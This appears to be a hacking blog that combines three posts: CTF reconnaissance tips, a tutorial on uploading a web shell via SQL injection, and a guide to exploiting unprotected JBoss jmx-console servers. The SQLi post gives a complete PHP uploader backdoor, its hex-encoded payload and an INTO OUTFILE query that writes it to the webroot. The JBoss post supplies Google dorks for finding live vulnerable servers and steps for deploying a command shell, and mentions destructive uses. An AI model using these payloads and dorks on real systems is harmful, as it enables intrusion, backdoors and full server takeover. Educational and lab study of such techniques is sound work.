Approaches to Solve CTF Problems| Solution

Hi , i will talking more about CTF(Capture The Flag) Things today.CTF are special kind of information security competition which test your all skills the you have learned over time.

CTF games often touch on many other aspects of information security: cryptography, stego, binary analysis, reverse engeneering, mobile security and others. Good teams generally have strong skills  and experience in all these issues.














we are going to talk more about the approaches towards it here are below listed some .


 1) 1st basic things to do is run a nmap scan on the target IP. 

Example : nmap -sV 192.11.XXX.XXX

then analyze the output response for useful information.it can be any thing again like open port or open name of the service and all other thing. in ideal case you get Http Service 80,SSH port 22 and 21 ftp these are the basic output that comes many time.

 2) Next thing to do is directly go ahead and browse the http services through browser.some time the source/response it self contain useful information.that helps in future. always remember the key to success is enumeration or retrieving as much information you gather the better chances of cracking that machine .

 3) ok we talked about the http side so the basic thing that you can directly perform is checking for robots.txt file.

so it could be like http://192.11.XXX.XXX/robots.txt

file many cases this contains information to next step or at least help in making further step.


 4) now save the content into a note file .if you are at kali machine the the simple command can be.

 wget http://192.11.XXX.XXX/robots.txt

then run a famous tool known as directory buster with this work list ,target is to perform fuzzing activity using the gathered information in order to land at another step. look for the directory where you have clue hidden for next step.

Thats all for today , i will be talking more on this tomorrow

Shell upload using SQL Injection

Every time we hear SQL injection, Database Dumping or admin panel access are the common things which comes to our mind. But there is more to that which we can achieve by taking advantage of SQL Injection like Shell Upload, gaining server access, executing remote process...etc.

You are reading this post means you already have a target that is vulnerable to SQL Injection or you can find one using Google dorks.For demo purpose we will be using BWAPP application(open source vulnerable application).

NOTE: This is Strictly for educational purpose only!

To Upload a Shell, below are the two requirements

1. A sql injection vulnerable point
2. Account which has privilege to create files in server.

Let's begin to exploit the SQLi vulnerability to upload shell.

• My target URL is http://localhost/bwapp/sqli_2.php?movie

• Now we have to know the number of columns of the current table. That we can achieve using order by.
• Let’s try with http://localhost/bwapp/sqli_2.php?movie=1 order by 10 We get an Error message.
• Let’s try with http://localhost/bwapp/sqli_2.php?movie=8 order by 7. We are able to retrieve the data table.

•    Let’s try with http://localhost/bwapp/sqli_2.php?movie=8 order by 8. We get an Error message . So it confirms that table has 7 columns.

• Now we have to determine the vulnerable columns. In order to do that we will take help of the union select query. That can be done using http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,2,3,4,5,6,7

• Now we get that column 2,3,4,5 are vulnerable. (You can see output point in front end).
• Next we have to determine the current user. This can be done using http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user,3,4,5,6,7 from MySQL. User

           or

         http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user(),3,4,5,6,7

• So we get that the user is root.
• Lets check the privilege of the current user (root), because for uploading any file to the server the user must have the privilege.This can be easily done using http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,group_concat(user,0x3a,file_priv),3,4,5,6,7 from mysql.user

• So now we get to know that the root user has the privilege to create file on the server.

Note: If that is not the case for your user then you have to access the admin cred by dumping the tables.

• Now we have to determine the path where we can upload the shell.That can be done using http://localhost/bwapp/sqli_2.php?movie[]=1

• So we get to know that we can upload our shell in C:\xampp\htdocs\bWAPP\ directory
• Now this is the Final stage. We have to upload a php uploader which will help us in uploading shell in later stage.The "uploader php script" below is the code.
<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"> ';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form> ';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SuccessFul!!!</b><br><br>'; }else { echo '<b>Upload NOt Done!!!</b><br><br>'; }}?>

• The script has to be hex encoded and prefix 0x to make the system understand that this a hex code.
•    The final payload will be like 0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164205375636365737346756c2121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164204e4f7420446f6e652121213c2f623e3c62723e3c62723e273b207d7d3f3e
• And the final query will be

 http://localhost/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,0x3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164205375636365737346756c2121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164204e4f7420446f6e652121213c2f623e3c62723e3c62723e273b207d7d3f3e,3,4,5,6,7 INTO OUTFILE "C:\\xampp\\htdocs\\bWAPP\\uploader.php"--+&action=go

• You can access the uploader by visiting http://localhost/bwapp/uploader.php.

• Now using the uploader we can upload any shell.

Feel Free to Comment if you like the tutorial also you can ask your query in below box if you are stuck at any point.

Thanks for your time.

Manually Exploiting unprotected JBOSS jmx-console

JBoss is widely used web server for deploying web apps which are developed using Java. The default state may lead for an attacker to take complete control of the server.

These vulnerable website's can easily be found by using simple Google dork . say for example.

intitle:”JBoss Management Console – Server Information” “application server” inurl:”web-console” OR inurl:”jmx-console”

or

intitle:”JBoss JMX Management Console” inurl:”jmx-console”

Now i will explain in detail how to exploit the unprotected JBOSS jmx-console vulnerability.

Please note : This is for educational purpose and we do not motivate to try out this attack on real/production websites.

• Visit the affected URL which will be something like "http://example.com/jmx-console/" (which you got using Google dork ) .

• Search for “service= DeploymentFileRepository“in the jmx-Console page and open it.

• Now scroll down and search for the ‘void store ( )’ operation.

• Enter a command shell program by filling up all the parameters in the void store() operation as shown in the figure and click on the invoke button.

The jsp command shell is shown in the fig.

After invoking the void store() operation the shell will be successfully uploaded in the server and can be accessed by the following link

http://example.com/Command/CommandShell.jsp.

Using this you can execute any command of your choice of the CLI(Command Line Interface) like shutting down the server. I have used a simple shell for demonstration purposes, but we can upload shells with higher privileges which may lead to destructive scenarios and easily get the entire control of the server.

You can find these kind of shells from Google itself.

However you can download a few of the shells from the below link
Link to Download Shell

Reference:

https://www.redteam-pentesting.de/publications/2010-06-15-JBoss-AS-Deploying-WARs-with-the-DeploymentFileRepository-MBean.pdf

Suggestions are always welcome ,you can also comment your views on this .thanks for your time.